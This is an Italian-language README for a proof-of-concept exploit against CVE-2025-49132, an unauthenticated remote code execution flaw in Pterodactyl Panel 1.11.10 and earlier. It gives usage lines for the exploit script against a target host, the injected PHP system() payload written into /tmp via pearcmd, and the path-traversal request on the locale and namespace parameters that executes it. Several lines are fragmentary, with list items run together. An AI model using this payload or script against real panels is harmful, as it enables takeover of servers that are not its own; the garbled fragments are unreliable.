
Exploit PoC per CVE-2025-49132 (GHSA-24wv-6c99-f843) – Esecuzione di codice in remoto non autenticata in Pterodactyl Panel ≤ 1.11.10
Pterodactyl Panel - Esecuzione Remota di Codice non Autenticata (RCE)
CVE‑2025‑49132 è una vulnerabilità critica di Esecuzione Remota di Codice che colpisce Pterodactyl Panel <= 1.11.10.
Un attaccante non autenticato può sfruttare una validazione inadeguata degli input nell'endpoint /locales/locale.json per eseguire comandi di sistema arbitrari.
Corretto nella versione: 1.11.11
Uno sfruttamento riuscito consente:
.env)Gravità: Critica
La vulnerabilità esiste a causa di una validazione inadeguata di:
localenamespaceUn attaccante può:
../../../../../)config-create/tmpClassificazione della debolezza: CWE-94 -- Controllo Improprio della Generazione di Codice
python3 CVE-2025-49132-dbs.py --target <host> --cmd "<command>" [--path <pear_path>]
python3 CVE-2025-49132-dbs.py --target victim.com --cmd "whoami"
python3 CVE-2025-49132-dbs.py --target 192.168.1.10 --cmd "id" --path /usr/local/lib/php/PEAR
Percorso predefinito:
/usr/share/php/PEAR
Ottieni il percorso corretto dalla pagina /phpinfo.php

L'attaccante inietta un payload PHP malevolo in /tmp/payload.php usando:
/<?=system('id')?>+/tmp/payload.php
Chiamando:
?locale=../../../../../tmp&namespace=payload
Il server esegue il PHP iniettato.

locale e namespace